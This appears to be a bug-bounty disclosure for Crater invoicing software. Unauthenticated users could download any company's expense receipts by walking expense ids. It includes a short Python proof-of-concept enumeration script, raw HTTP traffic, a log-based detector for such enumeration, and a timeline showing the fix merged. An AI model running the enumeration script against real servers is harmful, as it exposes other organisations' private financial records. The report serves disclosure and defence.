Improper Access Control in crater-invoice/crater

Valid

Reported on

Dec 29th 2021


Description

In the current Crater release (commit faf1ef09, tag 5.0.6) I discovered that an unauthenticated user can download every expense receipt uploaded to any company.

Proof of Concept

import requests

# Walk candidate expense ids; no session cookie or token is sent with the request.
for i in range(1, 100):
    r = requests.get(f'http://172.17.0.1:8080/expenses/{i}/download-receipt')

    # A 200 means the server returned the receipt file without any authentication.
    if r.status_code == 200:
        print(f'Downloaded receipt for expense No.{i}')

Vulnerable request:

GET /expenses/2/download-receipt HTTP/1.1
Host: 172.17.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Host: 172.17.0.1:8080
Date: Wed, 29 Dec 2021 19:26:07 GMT
Connection: close
X-Powered-By: PHP/8.0.14
Cache-Control: public
Date: Wed, 29 Dec 2021 19:26:07 GMT
Last-Modified: Wed, 29 Dec 2021 19:15:13 GMT
Content-Disposition: attachment; filename=Sample.pdf
Content-Type: application/pdf
Content-Length: 65695
Accept-Ranges: bytes
Set-Cookie: XSRF-TOKEN=eyJpdiI6InNZRUpvRFo0T0cxNHVmdkxvZEFDRlE9PSIsInZhbHVlIjoia1dGYld4MUdNVFVEOGNTa0NDQkZvNTdCU093WUhTbVhkWkhLMDRRYTZXUHJVYjNIZ0pxSGF2dHp4ZDFpYjZKSDAvWFVEVmJDRDBWR3hVNHJZSDdvYk1PeTZhdGlMcmxLcUNBUkhweW80V2V4VHhJWlhRVDVkWll3VDBaZ3VmbWQiLCJtYWMiOiJlNGQ4NjBmMjdlNDJkZTk2NTk0NzZjODgwZTllZDZlM2M1MmE1Zjc5NjZkYjgyZjJiNTE4ZDUyOWM5MGZlYjE5IiwidGFnIjoiIn0%3D; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; samesite=lax
Set-Cookie: laravel_session=eyJpdiI6InV1aTZPVFlGZzNSNFFieHRnZVVzMVE9PSIsInZhbHVlIjoiNE5zMEZiNWlWVzBRRU5zdkljTi9acjFtT3lJNFpDeWJjSk9hZ1luRm9lSVgvVWc3OEJNcDhUcFJMMmNGQUVUbm9yd3FrY3dyOG5YQ0JPR1Zjamlpb1Zqd3VkUlM1YTU2bThLWEpGZDNIeHBpN3FlbDZMMEQ2M0xNZUpWd1F1QnQiLCJtYWMiOiIwN2M5NjI2YzZkY2UxNWEyOGY4M2VkM2U0ZDFkNDE3NWY4ZTVjZTY2NjhjZmMwZjM5ZmQ0NTA2MzEwNDYzNjY3IiwidGFnIjoiIn0%3D; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; httponly; samesite=lax

%PDF-1.4
%äüöß
2 0 obj
<</Length 3 0 R/Filter/FlateDecode>>
stream
...

Impact

This vulnerability allows an unauthenticated user to download all expense receipts stored in the instance, regardless of which company uploaded them.
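The proof of concept above walks expense ids in order, which leaves a distinctive trace in the web server's access log. The following is an added detection example, not code from the report or from the Crater project: it parses an assumed nginx/Apache combined-format log (the sample lines are constructed) and flags any client that probes many distinct ids on the download-receipt route within a short window, reporting which of those ids were actually served.

```python
import re
from collections import defaultdict
from datetime import datetime

# Assumed nginx/Apache "combined" access-log layout; the route pattern is the one in the report.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
RECEIPT_RE = re.compile(r'^/expenses/(?P<id>\d+)/download-receipt$')

# Constructed sample: 10.0.0.5 walks the ids in order (ids 4 and 7 do not exist);
# 10.0.0.9 fetches one receipt and one invoice, which is ordinary use.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Dec/2021:19:26:01 +0000] "GET /expenses/1/download-receipt HTTP/1.1" 200 65695
10.0.0.5 - - [29/Dec/2021:19:26:02 +0000] "GET /expenses/2/download-receipt HTTP/1.1" 200 65695
10.0.0.9 - - [29/Dec/2021:19:26:02 +0000] "GET /expenses/2/download-receipt HTTP/1.1" 200 65695
10.0.0.5 - - [29/Dec/2021:19:26:03 +0000] "GET /expenses/3/download-receipt HTTP/1.1" 200 40012
10.0.0.5 - - [29/Dec/2021:19:26:03 +0000] "GET /expenses/4/download-receipt HTTP/1.1" 404 1024
10.0.0.5 - - [29/Dec/2021:19:26:04 +0000] "GET /expenses/5/download-receipt HTTP/1.1" 200 9001
10.0.0.5 - - [29/Dec/2021:19:26:05 +0000] "GET /expenses/6/download-receipt HTTP/1.1" 200 12345
10.0.0.5 - - [29/Dec/2021:19:26:05 +0000] "GET /expenses/7/download-receipt HTTP/1.1" 404 1024
10.0.0.5 - - [29/Dec/2021:19:26:06 +0000] "GET /expenses/8/download-receipt HTTP/1.1" 200 777
10.0.0.9 - - [29/Dec/2021:19:40:00 +0000] "GET /invoices/12/pdf HTTP/1.1" 200 5000
"""

def receipt_hits(log_text):
    """Yield (ip, timestamp, expense_id, status) for each request to the receipt route."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        r = RECEIPT_RE.match(m['path']) if m else None
        if r:
            ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
            yield m['ip'], ts, int(r['id']), int(m['status'])

def find_enumeration(log_text, min_ids=4, window_seconds=60):
    """Return {ip: (ids probed, ids served with HTTP 200)} for clients that touch at least
    min_ids distinct ids within window_seconds; 404s count as probes, since a walk hits gaps."""
    by_ip = defaultdict(list)
    for ip, ts, eid, status in receipt_hits(log_text):
        by_ip[ip].append((ts, eid, status))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        for i, (start, _, _) in enumerate(events):
            window = [e for e in events[i:] if (e[0] - start).total_seconds() <= window_seconds]
            probed = {eid for _, eid, _ in window}
            if len(probed) >= min_ids:
                served = sorted(eid for _, eid, st in window if st == 200)
                flagged[ip] = (sorted(probed), served)
                break
    return flagged
```

Running `find_enumeration(SAMPLE_LOG)` flags only 10.0.0.5, with six of its eight probed ids served; after the fix the same walk should produce no 200 responses for an unauthenticated client, so the served list is the value to alert on.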

Occurrences

We are processing your report and will contact the crater-invoice/crater team within 24 hours. 5 months ago
We have contacted a member of the crater-invoice/crater team and are waiting to hear back 5 months ago
We have sent a follow up to the crater-invoice/crater team. We will try again in 7 days. 5 months ago
We have sent a second follow up to the crater-invoice/crater team. We will try again in 10 days. 5 months ago
Mohit Panjwani validated this vulnerability 5 months ago
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
Mohit Panjwani confirmed that a fix has been merged on dd324c 4 months ago
Mohit Panjwani has been awarded the fix bounty
web.php#L88 has been validated